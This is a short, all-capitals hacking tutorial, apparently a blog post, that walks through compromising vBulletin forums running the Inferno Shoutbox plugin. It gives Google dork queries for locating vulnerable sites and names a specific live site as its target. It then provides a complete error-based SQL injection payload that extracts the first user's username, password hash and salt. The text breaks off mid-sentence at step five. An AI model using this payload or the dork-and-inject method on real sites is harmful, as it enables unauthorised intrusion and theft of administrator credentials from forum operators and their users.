HELLO ALL , TODAY I AM GOING TO SHOW HOW TO HACK VBULLETIN USING A PRIVATE 0 DAY EXPLOITS STEP 1 :- FINDING THE VULNERABLE FORUMS USING GOOGLE DORKS. GO TO www.google.com AND TYPE : INURL: infernoshout.php OR inurl: infernoshout.php?do=options&area=commands STEP 2 :- FINDING THE SITE (CHECK THE PICS) I HAVE TAKEN www.grinderscape.org AS THE LIVE POC FOR THIS 0 DAY EXPLOIT STEP 3 :- KEEP SEEING THE PICS AND FIGURE IT OUT. STEP 4 :- INPUTTING THE CODE : GO TO THE COMMANDS AREA WHERE IT SAYS COMMAND INPUT AND COMMAND OUTPUT IN THE FIRST LINK. PASS THESE COMMANDS : COMMAND INPUT :- ’ and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ”=’# COMMAND OUTPUT :- TYPE ANYTHING THERE IT DOESNT REALLY MATTER . AND HIT SAVE SETTING. STEP 5 :- DATABASE ERROR : WHEN Y
Comments
Post a Comment